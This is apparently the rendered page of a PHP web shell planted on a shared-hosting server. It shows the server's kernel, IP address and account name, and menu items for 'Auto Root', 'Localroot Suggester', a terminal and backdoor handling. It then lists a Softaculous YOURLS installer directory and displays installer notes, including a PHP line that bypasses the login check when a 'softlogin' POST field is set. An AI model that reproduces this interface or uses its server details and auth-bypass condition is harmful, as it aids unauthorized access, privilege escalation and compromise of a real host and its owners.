Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.225.72.2
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
yourls /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-04-26 14:15
php53
[ DIR ]
drwxr-xr-x
2025-04-26 14:15
php56
[ DIR ]
drwxr-xr-x
2025-04-26 14:15
php71
[ DIR ]
drwxr-xr-x
2025-04-26 14:15
php81
[ DIR ]
drwxr-xr-x
2025-04-26 14:15
php82
[ DIR ]
drwxr-xr-x
2025-04-26 14:15
.htaccess
241
B
-rw-r--r--
2021-12-23 11:54
changelog.txt
2.25
KB
-rw-r--r--
2025-04-25 09:27
clone.php
3.96
KB
-rw-r--r--
2025-04-25 09:28
config.php
3.58
KB
-rw-r--r--
2021-12-23 11:54
edit.php
4.4
KB
-rw-r--r--
2025-04-25 09:28
edit.xml
433
B
-rw-r--r--
2021-12-23 11:54
fileindex.php
275
B
-rw-r--r--
2021-12-23 11:54
import.php
3.78
KB
-rw-r--r--
2025-04-25 09:28
index.php
40
B
-rw-r--r--
2021-12-23 11:54
info.xml
2.09
KB
-rw-r--r--
2025-04-25 09:27
install.js
921
B
-rw-r--r--
2021-12-23 11:54
install.php
4.22
KB
-rw-r--r--
2025-04-25 09:28
install.xml
1.27
KB
-rw-r--r--
2021-12-23 11:54
md5
1.96
KB
-rw-r--r--
2025-04-25 09:28
mod_upgrade.php
2.93
KB
-rw-r--r--
2022-05-31 11:16
notes.txt
652
B
-rw-r--r--
2025-04-04 07:44
orig_upgrade.php
2.9
KB
-rw-r--r--
2022-05-31 11:16
upgrade.php
5.36
KB
-rw-r--r--
2025-04-25 09:28
upgrade.xml
393
B
-rw-r--r--
2021-12-23 11:54
yourls.sql
2.88
KB
-rw-r--r--
2025-04-25 09:27
yourls.zip
5.21
MB
-rw-r--r--
2025-04-25 09:27
Save
Rename
1. We add the index.php because it does not display any content on frontend so just added index.php which includes admin/index.php 2. Database Upgrade is to be done only when the datbase version has changed in options table 3. We have tested since the versions in 2011 and there is no database change, so when there is database change in future please check auto upgrade properly 4. We copy the mod_upgrade.php for auto upgrade and then after auto upgrade we revert the original file orig_upgrade.php if(empty($_POST['softlogin'])){ yourls_maybe_require_auth(); } 5. PHP REQUIREMENT LINK : https://github.com/YOURLS/YOURLS/blob/master/readme.html#L534